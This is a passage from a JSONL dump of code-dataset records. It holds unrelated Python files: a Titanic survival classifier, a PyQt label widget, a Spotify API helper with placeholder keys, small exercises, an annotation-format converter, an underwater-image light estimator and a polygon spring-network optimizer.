from family-size\r\ndef convert_familysize(size):\r\n if(size == 1): \r\n return 'Single'\r\n elif(size <=5): \r\n return 'Medium'\r\n else: \r\n return 'Large'\r\ntitanic_train['FamilyGroup'] = titanic_train['FamilySize'].map(convert_familysize)\r\nsns.factorplot(x=\"FamilyGroup\", hue=\"Survived\", data=titanic_train, kind=\"count\", size=6)\r\n\r\nfg_encoder = preprocessing.LabelEncoder()\r\nfg_encoder.fit(titanic_train['FamilyGroup'])\r\ntitanic_train['FamilyGroup_encoded'] =fg_encoder.transform(titanic_train['FamilyGroup'])\r\n\r\n\r\nfeatures = ['SibSp', 'Parch', 'Fare', 'Pclass_encoded', 'Sex_encoded', 'Age_imputed', 'Embarked_encoded', 'Title_encoded', 'FamilySize', 'FamilyGroup_encoded']\r\nX = titanic_train[ features ]\r\ny = titanic_train['Survived']\r\n\r\nX_train, X_eval, y_train, y_eval = model_selection.train_test_split(X, y, test_size=0.1, random_state=1)\r\n\r\nbase_estimator = tree.DecisionTreeClassifier()\r\nada_estimator = ensemble.AdaBoostClassifier(base_estimator)\r\nada_grid = {'base_estimator__max_depth': [3,4,5], 'n_estimators':list(range(30, 200, 50)), 'learning_rate':[0.1,0.3,0.5,1.0]}\r\nada_grid_estimator = model_selection.GridSearchCV(ada_estimator, ada_grid, scoring='accuracy', cv=10)\r\nada_grid_estimator.fit(X_train, y_train)\r\nprint(ada_grid_estimator.best_params_)\r\nprint(ada_grid_estimator.best_score_)\r\nprint(ada_grid_estimator.best_estimator_.estimators_)\r\nprint(ada_grid_estimator.score(X_train, y_train))\r\n\r\nprint(ada_grid_estimator.score(X_eval, y_eval))\r\n\r\nxgb_estimator = xgb.XGBClassifier()\r\nxgb_grid = {'max_depth':[1,2,3], 'n_estimators':list(range(50,150, 30)), 'learning_rate':[0.1, 0.2, 0.5, 1.0], 'reg_alpha':[0, 0.5], 'reg_lambda':[0.5, 1] }\r\nxgb_grid_estimator = model_selection.GridSearchCV(xgb_estimator, xgb_grid, scoring='accuracy', cv=10)\r\nxgb_grid_estimator.fit(X_train, y_train)\r\nprint(xgb_grid_estimator.best_params_)\r\nprint(xgb_grid_estimator.best_score_)\r\nprint(xgb_grid_estimator.best_estimator_)\r\nprint(xgb_grid_estimator.score(X_train, y_train))\r\n\r\nprint(xgb_grid_estimator.score(X_eval, y_eval))\r\n\r\n\r\ntitanic_test = pd.read_csv(os.path.join(dir, 'test.csv'))\r\nprint(titanic_test.info())\r\n\r\ntitanic_test['Age_imputed'] = age_imputer.transform(titanic_test[['Age']])\r\ntitanic_test['Fare'] = fare_imputer.transform(titanic_test[['Fare']])\r\n\r\ntitanic_test['FamilySize'] = titanic_test['SibSp'] + titanic_test['Parch'] + 1\r\ntitanic_test['Title'] = titanic_test['Name'].map(extract_title)\r\ntitanic_test['FamilyGroup'] = titanic_test['FamilySize'].map(convert_familysize)\r\nsns.countplot(x='Title',data=titanic_test)\r\nsns.countplot(x='Title',data=titanic_train)\r\ntitanic_test.loc[titanic_test['Title']=='Dona', 'Title'] = 'Mrs'\r\n\r\ntitanic_test['Sex_encoded'] = sex_encoder.transform(titanic_test['Sex'])\r\ntitanic_test['Pclass_encoded'] = pclass_encoder.transform(titanic_test['Pclass'])\r\ntitanic_test['Embarked_encoded'] = emb_encoder.transform(titanic_test['Embarked'])\r\ntitanic_test['Title_encoded'] = title_encoder.transform(titanic_test['Title'])\r\ntitanic_test['FamilyGroup_encoded'] = fg_encoder.transform(titanic_test['FamilyGroup'])\r\n\r\nX_test = titanic_test[features]\r\ntitanic_test['Survived'] = xgb_grid_estimator.best_estimator_.predict(X_test)\r\ntitanic_test.to_csv(os.path.join(dir, 'submission.csv'), columns=['PassengerId', 'Survived'], index=False)\r\n\r\n","sub_path":"2019-october/5.kaggle(titanic)/titanic-v7.py","file_name":"titanic-v7.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"445290856","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtCore import pyqtSignal\nimport logs\nimport logging\n\n\nclass CategoryLabel(QtWidgets.QLabel):\n\n clicked = pyqtSignal(str)\n\n #Help from https://stackoverflow.com/questions/9384305/hover-issue-in-pyqt\n def __init__(self, parent=None, loglevel=logging.DEBUG):\n super(CategoryLabel, self).__init__(parent)\n self.logger = logs.build_logger(__name__, loglevel)\n self.loglevel = loglevel\n self.setMouseTracking(True)\n self.setStyleSheet('''\n font-family: Arial, Helvetica, sans-serif;\n background-color: rgb(6,12,233);\n font-size: 45px;\n color: #FFFFFF;\n font-weight: 700;\n text-decoration: none;\n font-style: normal;\n font-variant: normal;\n text-transform: uppercase;\n ''')\n\n def mousePressEvent(self, event):\n self.logger.debug(\"mousepressevent occurred, i am %s\" % (self.objectName()))\n self.clicked.emit(self.text())\n QtWidgets.QLabel.mousePressEvent(self, event)\n\n def hide(self) -> None:\n self.logger.debug(\"actioning hide\")\n super(CategoryLabel, self).hide()","sub_path":"CategoryLabel.py","file_name":"CategoryLabel.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"328811004","text":"\n# https://github.com/datademofun/spotify-flask/blob/master/datafoo/spotify.py\n\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport spotipy\nimport json\nimport requests\n\n# Client Keys\nCLIENT_ID = \"client-id\"\nCLIENT_SECRET = \"client-secret\"\nSPOTIPY_CLIENT_ID = \"client-id\"\nSPOTIPY_CLIENT_SECRET = \"client-secret\"\n\n# search for an artist and get the top 3 results from them\n\nsp = spotipy.Spotify(client_credentials_manager=SpotifyClientCredentials(SPOTIPY_CLIENT_ID, SPOTIPY_CLIENT_SECRET))\n\ndef search_artist(name):\n results = sp.search(q='artist:' + name, type='artist')\n items = results['artists']['items']\n results = {}\n if len(items) <= 3:\n for i in range(len(items)):\n artist = items[i]\n if len(artist['images']) > 0:\n results[artist['name']] = artist['images'][0]['url']\n else: \n results[artist['name']] = 'https://www.pacificfoodmachinery.com.au/media/catalog/product/placeholder/default/no-product-image-400x400.png'\n else:\n for i in range(3):\n if len(items) > 0:\n artist = items[i]\n if len(artist['images']) > 0:\n results[artist['name']] = artist['images'][0]['url']\n else: \n results[artist['name']] = 'https://www.pacificfoodmachinery.com.au/media/catalog/product/placeholder/default/no-product-image-400x400.png'\n return results\n\n# continuting from github code:\n\nGET_ARTIST_ENDPOINT = 'https://api.spotify.com/v1/artists/{id}'\nSEARCH_ENDPOINT = 'https://api.spotify.com/v1/search'\nRELATED_ARTISTS_ENDPOINT = 'https://api.spotify.com/v1/artists/{id}/related-artists'\nTOP_TRACKS_ENDPOINT = 'https://api.spotify.com/v1/artists/{id}/top-tracks'\n\n# https://developer.spotify.com/web-api/get-artist/\ndef get_artist(artist_id):\n url = GET_ARTIST_ENDPOINT.format(id=artist_id)\n resp = requests.get(url)\n return resp.json()\n\n# https://developer.spotify.com/web-api/search-item/\ndef search_by_artist_name(name):\n myparams = {'type': 'artist'}\n myparams['q'] = name\n resp = requests.get(SEARCH_ENDPOINT, params=myparams)\n return resp.json()\n\n# https://developer.spotify.com/web-api/get-related-artists/\ndef get_related_artists(artist_id):\n url = RELATED_ARTISTS_ENDPOINT.format(id=artist_id)\n resp = requests.get(url)\n return resp.json()\n\n# https://developer.spotify.com/web-api/get-artists-top-tracks/\ndef get_artist_top_tracks(artist_id, country='US'):\n url = TOP_TRACKS_ENDPOINT.format(id=artist_id)\n myparams = {'country': country}\n resp = requests.get(url, params=myparams)\n return resp.json()\n","sub_path":"prototype/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"651020943","text":"numero_01 = int(input('Digite o número inteiro 01: '))\nnumero_02 = int(input('Digite o número inteiro 02: '))\n\nif numero_01 > numero_02:\n df = numero_01 - numero_02\n print(f'{numero_01} É o maior Número')\n print(f'{df} Diferença entre os dois.')\n\nelse:\n df = numero_02 - numero_01\n print(f'{numero_02} É o maior número')\n print(f'{df} Diferença entre os dois')","sub_path":"Exercicios/Seção 05/06_Exercicio.py","file_name":"06_Exercicio.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339308631","text":"class Solution:\n def kWeakestRows(self, mat, k):\n out = []\n for rows in range (0,len(mat)):\n out.append([mat[rows].count(1), rows])\n out.sort()\n out_k = list(out[rows][1] for rows in range(k))\n return out_k\n\ndef main():\n mat = [[1,1,0,0,0],\n [1,1,1,1,0],\n [1,0,0,0,0],\n [1,1,0,0,0],\n [1,1,1,1,1]]\n k = 3\n sol = Solution()\n print(sol.kWeakestRows(mat,k))\n\nif __name__ == '__main__':\n main()","sub_path":"weekend_coding/k-weakest-soldiers.py","file_name":"k-weakest-soldiers.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156021944","text":"#!/usr/bin/env python\n#\n# converts annotatorjs from HxAT into catchpy web annotation format.\n# input file must contain a json array of annotatorjs objects\n#\n#\n\nimport contextlib\nimport json\nimport sys\n\ncontext_uri = 'http://catch-dev.harvardx.harvard.edu/catch-context.jsonld'\n\n# from http://stackoverflow.com/a/29824059\n@contextlib.contextmanager\ndef _smart_open(filename, mode='Ur'):\n if filename == '-':\n if mode is None or mode == '' or 'r' in mode:\n fh = sys.stdin\n else:\n fh = sys.stdout\n else:\n fh = open(filename, mode)\n\n try:\n yield fh\n finally:\n if filename is not '-':\n fh.close()\n\n\ndef annotator2oa(annotation):\n\n anno = {\n '@context': context_uri,\n 'id': str(annotation['id']),\n 'type': 'Annotation',\n 'schema_version': 'catch v1.0',\n 'created': annotation['created'],\n 'modified': annotation['updated'],\n 'creator': {\n 'id': annotation['user']['id'],\n 'name': annotation['user']['name'],\n },\n 'permissions': {\n 'can_read': annotation['permissions']['read'],\n 'can_update': annotation['permissions']['update'],\n 'can_delete': annotation['permissions']['delete'],\n 'can_admin': annotation['permissions']['admin'],\n },\n 'platform': {\n 'platform_name': 'hxat vX',\n 'context_id': annotation['contextId'] \\\n if 'contextId' in annotation else 'unknown',\n 'collection_id': annotation['collectionId'] \\\n if 'collectionId' in annotation else 'unknown',\n 'target_source_id': annotation['uri'],\n },\n 'body': {\n 'type': 'List',\n 'items': [],\n },\n 'target': {\n 'type': 'List',\n 'items': [],\n }\n }\n\n media = annotation['media']\n target_uri = str(annotation['uri'])\n\n # parse body\n anno['body']['items'].append({\n 'type': 'TextualBody',\n 'format': 'text/html',\n 'value': annotation['text'],\n 'purpose': 'replying' if media == 'comment' else 'commenting',\n })\n if 'tags' in annotation:\n for tag in annotation['tags']:\n anno['body']['items'].append({\n 'type': 'TextualBody',\n 'value': tag,\n 'purpose': 'tagging',\n })\n\n # parse target\n # TODO: not prepared to deal with multiple targets yet\n # TODO: meaning of \"source\" and \"uri\"\n target = []\n if media == 'comment':\n if 'parent' in annotation:\n if annotation['parent'] != '0':\n anno['target']['items'].append({\n 'type': 'Annotation',\n 'format': 'text/html',\n 'source': annotation['parent'],\n })\n else:\n # error: it's a comment, has parent, but\n # parent value is invalid... CORRUPTED DATA?\n raise Exception(('expect media=\"comment\" to have parent and',\n 'parent value != \"0\"'))\n else:\n # error: it's comment but has no parent; CORRUPTED DATA?\n raise Exception('expect media=\"comment\" to have a parent')\n\n elif media == 'text':\n # xpath and offset\n if 'ranges' not in annotation or not annotation['ranges']:\n raise Exception('expect media=\"text\" to have ranges')\n\n selector = {\n 'type': 'List',\n 'items': [],\n }\n for r in annotation['ranges']:\n s = {\n 'type': 'RangeSelector',\n 'startSelector': {\n 'type': 'XPathSelector',\n 'value': r['start'],\n },\n 'endSelector': {\n 'type': 'XPathSelector',\n 'value': r['end']\n },\n # refine by text position within xpath\n 'refinedBy': [{\n 'type': 'TextPositionSelector',\n 'start': r['startOffset'],\n 'end': r['endOffset'],\n }]\n }\n selector['items'].append(s)\n\n # TODO: quote is a refinement or a selector choice?\n if 'quote' in annotation and not annotation['quote']:\n quote = {\n 'type': 'TextQuoteSelector',\n 'exact': annotation['quote'],\n }\n if len(selector['items']) == 1:\n selector['items'][0]['refinedBy'].append(quote)\n else: # multiple selectors, or none:\n # quote is a selector not refinement\n # FIX: ? how do i know it's a selector refinement\n # OR 2 different selectors for the same text???\n selector.append(quote)\n\n # how do i know that it's not a text annotation without selector?\n if selector['items']:\n anno['target']['items'].append({\n 'type': 'Text',\n 'source': target_uri,\n 'format': 'text/html',\n 'selector': selector,\n })\n\n elif media == 'image':\n anno['target'] = webanno_target_for_annotator_image(annotation)\n\n elif media == 'video':\n if 'rangeTime' not in annotation:\n raise Exception('expect media=\"video\" to have rangeTime')\n sel = {\n 'type': 'FragmentSelector',\n 'conformsTo': 'http://www.w3.org/TR/media-frags/',\n 'value': 't={0},{1}'.format(\n annotation['rangeTime']['start'],\n annotation['rangeTime']['end']\n ),\n }\n if 'target' in annotation:\n sel['refinedBy'] = {\n 'type': 'CssSelector',\n 'value': '#{}'.format(annotation['target']['container']),\n # TODO: 'source': annotation['target']['src'],\n }\n selector = {\n 'type': 'List',\n 'items': [sel],\n }\n\n anno['target']['items'].append({\n 'type': 'Video',\n 'source': target_uri,\n # TODO: check that the format is youtube\n 'format': 'video/youtube',\n 'selector': selector,\n })\n\n assert(len(anno['target']['items']) > 0)\n\n return anno\n\n\n\ndef annotator_image_legacy_strategy_for_target_selector(annotation):\n pos = annotation['rangePosition']\n value = 'xywh={},{},{},{}'.format(\n pos['x'], pos['y'], pos['width'], pos['height'])\n selector = {\n 'type': 'FragmentSelector',\n 'conformsTo': 'http://www.w3.org/TR/media-frags/',\n 'value': value,\n }\n return selector\n\n\ndef annotator_image_2_1_strategy_for_target_selector(annotation):\n return {\n 'type': 'SvgSelector',\n 'value': annotation['rangePosition'],\n }\n\n\ndef webanno_target_for_annotator_image(annotation):\n\n if 'rangePosition' not in annotation:\n raise Exception('expect media=\"image\" to have rangePosition')\n\n if not isinstance(annotation['rangePosition'], list):\n rangePositionList = [annotation['rangePosition']]\n else:\n rangePositionList = annotation['rangePosition']\n\n selector = {\n 'type': 'List',\n 'items': [],\n }\n for pos in rangePositionList:\n if isinstance(pos, dict):\n # legacy strategy\n selector['items'].append(\n annotator_image_legacy_strategy_for_target_selector(annotation)\n )\n else: # 2.1 strategy\n selector['items'].append(\n annotator_image_2_1_strategy_for_target_selector(annotation)\n )\n if len(selector['items']) > 1:\n selector['type'] = 'Choice' # dual strategy\n target = {\n 'type': 'List',\n 'items': [{\n 'type': 'Image',\n 'source': str(annotation['uri']),\n 'selector': selector,\n },\n ]\n }\n if 'thumb' in annotation and annotation['thumb']:\n target['items'].append({\n 'type': 'Thumbnail',\n 'source': str(annotation['thumb']),\n 'format': 'image/jpg', # guessing\n })\n target['type'] = 'Choice'\n\n return target\n\n\n\ndef stderr_print(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n args = sys.argv[1]\n else:\n args = '-'\n\n with _smart_open(args) as handle:\n content = handle.read()\n\n annotation_obj = json.loads(content)\n if not isinstance(annotation_obj, list):\n annotation_list = [annotation_obj]\n else:\n annotation_list = annotation_obj\n\n results = []\n for anno in annotation_list:\n if '@context' not in anno: # check if iiif\n try:\n oa_ann = annotator2oa(anno)\n\n results.append(oa_ann)\n except Exception as e:\n stderr_print('----------------------------------------------------\\n')\n stderr_print('skipping annotation id={}'.format(anno['id']))\n stderr_print('error = {}'.format(e))\n\n print(json.dumps(results, indent=4))\n\n\n\n\n\n\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":9337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483045026","text":"##3. В класі Name визначте:\r\n##атрибути для first name та last name (fname та lname відповідно);\r\n##атрибут fullname що повертає first і last names;\r\n##атрибут initials який повертає ініціали (перші літери first та last name,\r\n##розділених ‘.’ .\r\n\r\nclass Name:\r\n def __init__(self, fname, lname):\r\n self.fname = fname\r\n self.lname = lname\r\n self.fullname = fname + \" \" + lname\r\n self.initials = fname[0].upper() + \".\" + lname[0].upper() + \".\"\r\n","sub_path":"P11_HW3.py","file_name":"P11_HW3.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"39000063","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\ndef Selection_SameFour(I_gray_Q,height_begin,height_end,width_begin,width_end):\r\n height = height_end - height_begin\r\n width = width_end - width_begin\r\n Q = []\r\n\r\n for i in range(height_begin,height_end):\r\n for j in range(width_begin,width_end):\r\n Q.append(I_gray_Q[i,j])\r\n Q = np.array(Q).reshape((height,width))\r\n return Q\r\n\r\ndef quadTree(img,I_gray_Q):\r\n height = I_gray_Q.shape[0]\r\n width = I_gray_Q.shape[1]\r\n\r\n if(height/2 == 1):\r\n height = height- 1\r\n if (width / 2 == 1 ):\r\n width = width - 1\r\n half_height = int(height/2)\r\n half_width = int(width/2)\r\n Q1 = Selection_SameFour(I_gray_Q,0,half_height,0,half_width)\r\n Q2 = Selection_SameFour(I_gray_Q,0,half_height,half_width,(half_width*2))\r\n Q3 = Selection_SameFour(I_gray_Q,half_height,(half_height*2),0,half_width)\r\n Q4 = Selection_SameFour(I_gray_Q,half_height,(half_height*2),half_width,(half_width*2))\r\n Q1_var = np.var(Q1)\r\n Q2_var = np.var(Q2)\r\n Q3_var = np.var(Q3)\r\n Q4_var = np.var(Q4)\r\n Q_var_min = np.min([Q1_var,Q2_var,Q3_var,Q4_var])\r\n if(Q1_var == Q_var_min):\r\n return img[0:half_height,0:half_width,:],Q1\r\n if (Q2_var == Q_var_min):\r\n return img[0:half_height,half_width:(half_width*2),:],Q2\r\n if (Q3_var == Q_var_min):\r\n return img[half_height:(half_height*2),0:half_width,:],Q3\r\n if (Q4_var == Q_var_min):\r\n return img[half_height:(half_height*2),half_width:(half_width*2),:],Q4\r\n\r\n\r\ndef getAtomsphericLightLv(img):\r\n I_gray_Q = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n for i in range(0,5):\r\n img,I_gray_Q = quadTree(img,I_gray_Q)\r\n AtomsphericLight = np.zeros(3)\r\n for i in range(3):\r\n AtomsphericLight[i] = np.mean(img[:,:,i])\r\n return AtomsphericLight\r\n\r\n\r\n","sub_path":"Underwater Image Color Restoration/IBLA/getAtomsphericLightTwo.py","file_name":"getAtomsphericLightTwo.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"335550201","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 8 11:42:19 2016\n\n@author: singh\n\"\"\"\n\n\n\n# ----------------------------------------------------IMPORT ALL THE PACKAGES-------------------------------------------\nimport numpy as np; import matplotlib;from matplotlib import pyplot as plt;import pylab;from scipy.spatial import distance \nimport matplotlib.patches as patches;import random; import scipy; import math; import sympy as sp; from sympy import * \nfrom scipy.spatial import distance ; import time; start_time = time.time(); from intro_hlpr2 import visualize\nimport os\n# ----------------------------------------------------------------------------------------------------------------------\n\n\n#----------------------------------------------THESE NOTATIONS MAKE THE WRITIGN EASIER----------------------------------\npi = np.pi ; dot = np.dot ; sin = np.sin ; cos = np.cos ; ar = np.array ; sqrt = np.sqrt; rand = scipy.rand \narange = scipy.arange; show = pylab.show; plot = pylab.plot; axis = pylab.axis; grid = pylab.grid; title = pylab.title \natan = np.arctan; transpose = np.transpose ; dotProduct = np.dot\n#-----------------------------------------------------------------------------------------------------------------------\n#runfile('C:/Users/singh/Dropbox/Synced Folders/Notes/June 2017/Elegant Plot/elegant-plot.py')\n#halffig()\n\nplt.close('all')\n\n\n#--------------------------------------------------------------OOP PART-------------------------------------------------\nclass UpdateNetwork(object):\n \n \n def __init__(self, X1, Y1, Theta1, LenVec1, Phi1, X2, Y2, Theta2, LenVec2, Phi2, BCPM2D, BCPM3D): \n \"\"\"Initialize the network by defining the current position vector, the connectivity among the members, the shape\n information of the members. Preallocate the First Derivative Vector(FDV) and the Second Derivative Matrix(SDM) \n for the netwrok.\"\"\"\n \n self.X1 = X1; self.Y1 = Y1; self.Theta1 = Theta1; self.LenVec1 = LenVec1; self.Phi1 = Phi1\n self.X2 = X2; self.Y2 = Y2; self.Theta2 = Theta2; self.LenVec2 = LenVec2; self.Phi2 = Phi2\n self.BCPM2D = BCPM2D\n self.BCPM3D = BCPM3D \n self.FDV = np.zeros((10, 6))\n self.SDM = np.zeros((10, 6, 6)) \n \n \n def UpdateFirstDerivativeVector(self):\n \"\"\"Fill the appropriate elements of FDV by considering every connection in the network one by one. Derivatives \n are calculated analytically.\"\"\"\n \n X1 = self.X1; Y1 = self.Y1; Theta1 = self.Theta1; LenVec1 = self.LenVec1; Phi1 = self.Phi1 \n X2 = self.X2; Y2 = self.Y2; Theta2 = self.Theta2; LenVec2 = self.LenVec2; Phi2 = self.Phi2 \n \n self.FDV[:, 0] = 2*X1 - 2*X2 + 2*LenVec1*cos(Theta1 + Phi1) - 2*LenVec2*cos(Theta2 + Phi2)\n \n self.FDV[:, 1] = 2*Y1 - 2*Y2 + 2*LenVec1*sin(Theta1 + Phi1) - 2*LenVec2*sin(Theta2 + Phi2)\n \n self.FDV[:, 2] = 2*LenVec1*(-X1 + X2 - LenVec1*cos(Theta1 + Phi1) + LenVec2*cos(Theta2 + Phi2))\\\n *sin(Theta1 + Phi1) - 2*LenVec1*(-Y1 + Y2 - LenVec1*sin(Theta1 + Phi1) +\\\n LenVec2*sin(Theta2 + Phi2))*cos(Theta1 + Phi1)\n \n self.FDV[:, 3] = -2*X1 + 2*X2 - 2*LenVec1*cos(Theta1 + Phi1) + 2*LenVec2*cos(Theta2 + Phi2)\n \n self.FDV[:, 4] = -2*Y1 + 2*Y2 - 2*LenVec1*sin(Theta1 + Phi1) + 2*LenVec2*sin(Theta2 + Phi2)\n \n self.FDV[:, 5] = -2*LenVec2*(-X1 + X2 - LenVec1*cos(Theta1 + Phi1) + LenVec2*cos(Theta2 + Phi2))\\\n *sin(Theta2 + Phi2) + 2*LenVec2*(-Y1 + Y2 - LenVec1*sin(Theta1 + Phi1) +\\\n LenVec2*sin(Theta2 + Phi2))*cos(Theta2 + Phi2) \n \n self.FDV = self.FDV.flatten()[(np.cumsum(self.BCPM2D).reshape(self.BCPM2D.shape)-1)*self.BCPM2D] * self.BCPM2D\n self.FDV = np.sum(self.FDV, axis = 0) \n self.FDV = self.FDV.reshape(24,1)\n \n self.FDV[2,0] = 0.0\n self.FDV[5,0] = 0.0 \n return self.FDV \n \n \n def UpdateSecondDerivativeMatrix(self):\n \"\"\"Fill the appropriate elements of SDM by considering every connection in the network one by one. Derivatives \n are calculated analytically.\"\"\"\n X1 = self.X1; Y1 = self.Y1; Theta1 = self.Theta1; LenVec1 = self.LenVec1; Phi1 = self.Phi1 \n X2 = self.X2; Y2 = self.Y2; Theta2 = self.Theta2; LenVec2 = self.LenVec2; Phi2 = self.Phi2\n \n self.SDM[:,0,0] += 2.0 \n self.SDM[:,1,1] += 2.0\n self.SDM[:,3,3] += 2.0\n self.SDM[:,4,4] += 2.0\n \n self.SDM[:,0,3] += -2.0 \n self.SDM[:,3,0] += -2.0\n self.SDM[:,1,4] += -2.0 \n self.SDM[:,4,1] += -2.0\n \n self.SDM[:,0,1] = self.SDM[:,1,0] = self.SDM[:,0,4] = self.SDM[:,4,0] = self.SDM[:,1,3] = self.SDM[:,3,1] = \\\n self.SDM[:,3,4] = self.SDM[:,4,3] = 0.0\n \n self.SDM[:,0,2] += -2*LenVec1*sin(Theta1 + Phi1)\n self.SDM[:,2,0] += -2*LenVec1*sin(Theta1 + Phi1) \n self.SDM[:,0,5] += 2*LenVec2*sin(Theta2 + Phi2)\n self.SDM[:,5,0] += 2*LenVec2*sin(Theta2 + Phi2)\n self.SDM[:,1,2] += 2*LenVec1*cos(Theta1 + Phi1)\n self.SDM[:,2,1] += 2*LenVec1*cos(Theta1 + Phi1) \n self.SDM[:,1,5] += -2*LenVec2*cos(Theta2 + Phi2)\n self.SDM[:,5,1] += -2*LenVec2*cos(Theta2 + Phi2) \n \n self.SDM[:,2,2] += 2*LenVec1*(LenVec1*sin(Theta1 + Phi1)**2 + LenVec1*cos(Theta1 + Phi1)**2 - (X1 - X2 + \\\n LenVec1*cos(Theta1 + Phi1)- LenVec2*cos(Theta2 + Phi2))*cos(Theta1 + Phi1) - (Y1 - Y2 +\\\n LenVec1*sin(Theta1 + Phi1) - LenVec2*sin(Theta2 + Phi2))*sin(Theta1 + Phi1))\n \n self.SDM[:,2,3] += 2*LenVec1*sin(Theta1 + Phi1)\n self.SDM[:,3,2] += 2*LenVec1*sin(Theta1 + Phi1) \n self.SDM[:,2,4] += -2*LenVec1*cos(Theta1 + Phi1)\n self.SDM[:,4,2] += -2*LenVec1*cos(Theta1 + Phi1)\n \n self.SDM[:,2,5] += -2*LenVec1*LenVec2*(sin(Theta1+Phi1)*sin(Theta2+Phi2) + cos(Theta1+Phi1)*cos(Theta2+Phi2))\n self.SDM[:,5,2] += -2*LenVec1*LenVec2*(sin(Theta1+Phi1)*sin(Theta2+Phi2) + cos(Theta1+Phi1)*cos(Theta2+Phi2))\n \n self.SDM[:,3,5] += -2*LenVec2*sin(Theta2 + Phi2) \n self.SDM[:,5,3] += -2*LenVec2*sin(Theta2 + Phi2) \n self.SDM[:,4,5] += 2*LenVec2*cos(Theta2 + Phi2)\n self.SDM[:,5,4] += 2*LenVec2*cos(Theta2 + Phi2)\n \n self.SDM[:,5,5] += 2*LenVec2*(LenVec2*sin(Theta2 + Phi2)**2 + LenVec2*cos(Theta2 + Phi2)**2 + (X1 - X2 +\\\n LenVec1*cos(Theta1 + Phi1)- LenVec2*cos(Theta2 + Phi2))*cos(Theta2 + Phi2) + (Y1 - Y2\\\n + LenVec1*sin(Theta1 + Phi1) -LenVec2*sin(Theta2 + Phi2))*sin(Theta2 + Phi2))\n \n self.SDM = self.SDM.flatten()[(np.cumsum(self.BCPM3D).reshape(self.BCPM3D.shape)-1)*self.BCPM3D] * self.BCPM3D \n self.SDM = np.sum(self.SDM, axis = 0)\n \n self.SDM[2, :] = self.SDM[:, 2] = 0.0\n self.SDM[5, :] = self.SDM[:, 5] = 0.0 \n return self.SDM\n\n\n def EnergyStoredInSprings(self):\n X1 = self.X1; Y1 = self.Y1; Theta1 = self.Theta1; LenVec1 = self.LenVec1; Phi1 = self.Phi1 \n X2 = self.X2; Y2 = self.Y2; Theta2 = self.Theta2; LenVec2 = self.LenVec2; Phi2 = self.Phi2 \n self.Energy = ((LenVec1*np.cos(Phi1+Theta1)+X1)-(LenVec2*np.cos(Phi2+Theta2)+X2))**2+((LenVec1*np.sin(Phi1+\\\n Theta1)+Y1)-(LenVec2*np.sin(Phi2+Theta2)+Y2))**2\n self.Energy = np.sum(self.Energy, axis = 0) \n return self.Energy \n#-----------------------------------------------------------------------------------------------------------------------\n \n\n\n\ndef my_func(ShapeInfo): \n\tn = 3 ; numberOfPolygons = n**2\n\tnumberOfConnections = int((2*4 + 3*4*(n-2) + 4*(n**2 - 4*(n-2) -4))/2) \n\n\n\n\t#--------------------------------------DEFINE THE POSITION VECTOR OF THE PARTICLES--------------------------------------\n\t'''startingPositionVector encodes the position and orientation of the polygons. Preallocate the position vector. Fill in \n\tthe appropriate places of the vector and randomize things a bit.''' \n\tstartingPositionVector = np.zeros((3*(numberOfPolygons - 1), 1), dtype = float) \n\t\t\t\t\t\t\t\t\t\t\t \n\tfor Polygon in range(numberOfPolygons - 1):\n\t\tstartingPositionVector[3*Polygon : 3*Polygon+3] = np.array([[10+10*(Polygon%n)], [10-10*(Polygon//n)], [0]]) \n\t#-----------------------------------------------------------------------------------------------------------------------\n\n\n\n\t\t\t\t\t\t\n\t#---------------------------------------ENCODE THE CONNECTION AMONG THE PARTICLES---------------------------------------\n\t'''ConnectedPolygonsMatrix(CPM) tells which two bodies are connected. The connections are first considered 'row- wise' \n\tand than 'column-wise'. Every row of CPM denotes a connection.''' \n\tCPM = np.zeros((numberOfConnections,2), dtype = int); j = 0\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \n\tfor RowCxnNum in range(n): \n\t\tfor i in range (1 , n): \n\t\t\tCPM[j] = [i + n*RowCxnNum-1, i + n*RowCxnNum + 1-1]\n\t\t\tj = j + 1\n\t\t\t\n\tfor ColumnCxnNum in range(n): \n\t\tfor i in range (1 , n):\n\t\t\tCPM[j] = [ColumnCxnNum + n*i-(n-1)-1, ColumnCxnNum + n*i-(n-1) + n-1]\n\t\t\tj = j + 1 \n\t#-----------------------------------------------------------------------------------------------------------------------\n\tCPM = np.delete(CPM, [5,11], 0)\n\n\n\t#--------------------------------------2D AND 3D BOOLEAN CONNECTED POLYGONS MATRIX--------------------------------------\n\t'''The connection among the polygons is represented in Boolean fashion. The number of rows in BooleanConnectedPolygonsM-\n\ttrix2D(BCPM2D) = numberOfConnections. The number of column in the BooleanCPM is equal to len(PositionVector)'''\n\tBCPM2D = np.zeros((numberOfConnections-2, len(startingPositionVector)), dtype = int)\n\tBCPM3D = np.zeros((numberOfConnections-2, len(startingPositionVector), len(startingPositionVector)), dtype = int)\n\n\tfor i in range(numberOfConnections-2):\n\t\tBCPM2D[i, 3*CPM[i,0]:3*CPM[i,0]+3] = 1 \n\t\tBCPM2D[i, 